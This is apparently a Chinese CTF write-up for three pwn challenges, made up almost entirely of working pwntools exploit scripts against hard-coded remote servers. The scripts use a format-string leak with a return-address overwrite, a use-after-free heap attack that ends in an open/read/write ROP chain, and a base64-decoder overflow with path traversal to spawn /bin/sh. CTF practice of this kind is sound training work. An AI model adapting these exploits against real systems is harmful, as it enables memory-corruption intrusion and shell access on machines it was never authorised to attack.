AK了PWN,一个2血+一个3血

PWN

fmt

格串

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/python2
from pwn import *

context.binary = 'fmt'
libc = ELF('libc.so.6', checksec = False)
io = remote('60.204.140.184', 30137)

ru          = lambda x          : io.recvuntil(x, drop = True)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()
uu64        = lambda x          : u64(x.ljust(8, '\x00'))
libc_os     = lambda x          : libc_base + x

pld = flat([
    ',%10$p'
    ',%12$p,\x00'
])
sla('I need a str: ', pld)
ru(',')
libc_base = int(ru(','), 16) - libc.sym['_IO_2_1_stderr_']
stack_addr = int(ru(','), 16)
ret_addr = stack_addr + 0x22
one = libc_os(0xe3b01)
pld = flat([
    '%',
    str(int(hex(one)[-8:-4], 16)),
    'c',
    '%12$hn',
    '%',
    str(int(hex(one)[-4:], 16) - int(hex(one)[-8:-4], 16)),
    'c',
    '%13$hn'
])
pld = pld.ljust(0x30, 'a')
pld += flat([
    ret_addr + 2,
    ret_addr
])
sla('I need other str: ', pld)
ia()

mi

UAF

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
#!/usr/bin/python2
from pwn import *

io = remote('123.60.179.52', 30307)
context.binary = 'pwn'
libc = ELF('libc.so.6', checksec = False)

rc          = lambda n          : io.recv(n)
ru          = lambda x          : io.recvuntil(x, drop = True)
sa          = lambda a, b       : io.sendafter(a, b)
sla         = lambda a, b       : io.sendlineafter(a, b)
ia          = lambda            : io.interactive()
uu64        = lambda x          : u64(x.ljust(8, '\x00'))
libc_os     = lambda x          : libc_base + x
libc_sym    = lambda x          : libc_os(libc.sym[x])

def menu(choice):
    sla('>>', str(choice))

def add(size, content):
    menu(1)
    sla('Pls input the size:\n', str(size))
    sa('Pls input Content:\n', content)

def delete(idx):
    menu(2)
    sla('Please input the idx:\n', str(idx))

def edit(idx, content):
    menu(3)
    sla('Please input the idx:\n', str(idx))
    sa('Pls input the Content:\n', content)

def show(idx):
    menu(4)
    sla('Please input the idx:\n', str(idx))

for i in range(2):
	add(0x500, 'a')
for i in range(4):
	delete(0)
add(0x500, 'a')
edit(0, 'aa')
show(0)
leak = uu64(ru('\n'))
leak = leak >> 16 << 16
leak_libc_addr = leak - (0x4297c020000 - 0x4297c000210)
edit(0, flat(leak_libc_addr))
add(0x500, 'a')
pld = flat({0x30: 'a'})
add(0x500, pld)
show(4)
rc(0x30)
libc_base = uu64(ru('\n')) - 0x214861
environ = libc_sym('environ')
pld = flat([
    1,
    0x3300030002,
    environ - 0x10,
    0x50000000002,
    0,
    0,
    0x7f4a25193820
])
edit(4, pld)
add(0x500, 'a' * 0x10)
show(5)
rc(0x10)
stack_addr = uu64(ru('\n'))
ret_addr = stack_addr - (0x7ffde5436a68 - 0x7ffde5436948)
pld = flat([
    1,
    0x3300030002,
    ret_addr,
    0x50000000002,
    0,
    0,
    0x7f4a25193820
])
edit(4, pld)
read_addr = libc_sym('read')
write_addr = libc_sym('write')
open_addr = libc_sym('open')
pop_rdi = libc_os(0x0000000000023b6a)
pop_rsi = libc_os(0x000000000002601f)
pop_rdx = libc_os(0x0000000000142c92)
flag_addr = ret_addr + 0x78
rop_chain = flat([
    pop_rdi,
    flag_addr,
    pop_rsi,
    0,
    open_addr,
    pop_rdi,
    3,
    pop_rsi,
    ret_addr + 0x100,
    pop_rdx,
    0x50,
    read_addr,
    pop_rdi,
    1,
    write_addr
])
rop_chain += '/flag\x00'
add(0x500, rop_chain)
ia()

ezhttp

base64解码函数存在数组溢出

1
2
3
4
5
6
7
8
9
10
11
#!/usr/bin/python2
from pwn import *
from base64 import b64encode

r = remote('123.60.179.52', 30266)
key = flat({0x40: '/../../../../bin/sh?.html'}, filler = '\x00')
pld = '''GET /index.html
Authorization: Basic '''
pld += b64encode(key) + '\n'
r.sendline(pld)
r.interactive()